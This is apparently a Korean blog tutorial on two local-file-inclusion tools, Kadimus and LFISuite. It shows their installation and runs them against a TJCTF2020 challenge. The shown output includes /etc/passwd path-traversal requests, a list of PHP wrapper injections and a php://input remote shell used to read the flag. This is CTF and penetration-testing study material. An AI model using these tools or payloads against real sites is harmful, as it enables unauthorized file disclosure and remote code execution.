Kadimus

https://github.com/P0cL4bs/Kadimus

Install

apt install libcurl4-openssl-dev
apt install libpcre3-dev
apt install libssh-dev
git clone https://github.com/P0cL4bs/kadimus.git
cd kadimus
make

Run

./kadimus

Usage

Github에 설명처럼 옵션을 전달하는 형태로 사용할 수 있다.

다음은 취약점 스캔 예시다.

root@hp-virtual-machine:/work/tools/kadimus# ./kadimus -u https://file_viewer.tjctf.org/reader.php?file=contact -A my_user_agent
 _  __         _ _                     
| |/ /__ _  __| (_)_ __ ___  _   _ ___ 
| ' // _` |/ _` | | '_ ` _ \| | | / __|
| . \ (_| | (_| | | | | | | | |_| \__ \
|_|\_\__,_|\__,_|_|_| |_| |_|\__,_|___/

  v1.5 - LFI Scan & Exploit Tool (@hc0d3r - P0cL4bs Team)

[12:27:13] [INFO] starting scanning the URL: https://file_viewer.tjctf.org/reader.php?file=contact
[12:27:13] [INFO] testing if URL have dynamic content ...
[12:27:15] [INFO] URL dont have dynamic content
[12:27:15] [INFO] analyzing 'file' parameter ...
[12:27:15] [INFO] checking for lfi error messages
[12:27:15] [INFO] using random url: https://file_viewer.tjctf.org/reader.php?file=gdBHSIP
[12:27:16] [WARNING] lfi error not found
[12:27:16] [INFO] starting source disclosure test ...
[12:27:18] [WARNING] parameter does not seem vulnerable to source disclosure
[12:27:18] [INFO] checking common files ...
[12:27:18] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd%00
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd
[12:27:19] [INFO] regex match: root:.*:0
[12:27:19] [INFO] check the url: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd
[12:27:19] [INFO] regex match: root:.*:0
[12:27:19] [INFO] check the url: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd%00

좀 별로..

---

LFISuite

https://github.com/D35m0nd142/LFISuite

Install

git clone https://github.com/D35m0nd142/LFISuite.git

Run

python lfisuite.py

Usage

실행하면 스캔, 익스플로잇을 선택할 수 있다.

[*] Checking for LFISuite updates..
[-] No updates available.

--------------------
 1) Exploiter       
 2) Scanner         
 x) Exit            
--------------------
 -> 1

Scan

입력해야될 정보를 물어보기 때문에 맞는 정보를 입력해주면 된다.

[*] Enter cookies if needed (ex: 'PHPSESSID=12345;par=something') [just enter if none] -> 

[?] Do you want to enable TOR proxy ? (y/n) n

Exploit

마찬가지로 입력할 정보를 물어보는데, 공격할 취약점을 선택해야 한다.

____________________________

    Available Injections    
____________________________

 1) /proc/self/environ      
 2) php://filter            
 3) php://input             
 4) /proc/self/fd           
 5) access_log              
 6) phpinfo                 
 7) data://		    	   
 8) expect://		  	   
 9) Auto-Hack  			 
 x) Back 	

스캔 기능으로 확인한 취약점을 선택하면 자동으로 익스플로잇해준다.
php://input을 예시로 선택해보면

[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> https://file_viewer.tjctf.org/reader.php?file=

[+] The website seems to be vulnerable. Opening a Shell..
[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),"content");]

취약한 URL을 입력해주면 익스플로잇에 성공하는데, RCE를 bash 쉘처럼 사용할 수 있게 인터페이스를 제공해준다.
예시 URL은 TJCTF2020의 File Viewer 문제이고, LFISuite를 이용해 flag를 얻을 수 있었다.

www-data@file_viewer.tjctf.org:/var/www/html$ ls
apple.txt
grape.txt
i_wonder_whats_in_here
index.html
orange.txt
pear.txt
pinneaple.txt
reader.php
watermelon.txt
www-data@file_viewer.tjctf.org:/var/www/html$ cat i_wonder*/flag.php
<?php
    // tjctf{n1c3_j0b_with_lf1_2_rc3}
?>

---

참조

https://www.peerlyst.com/posts/pentest-tools-lfi-scanners-and-exploiters-karl-m-1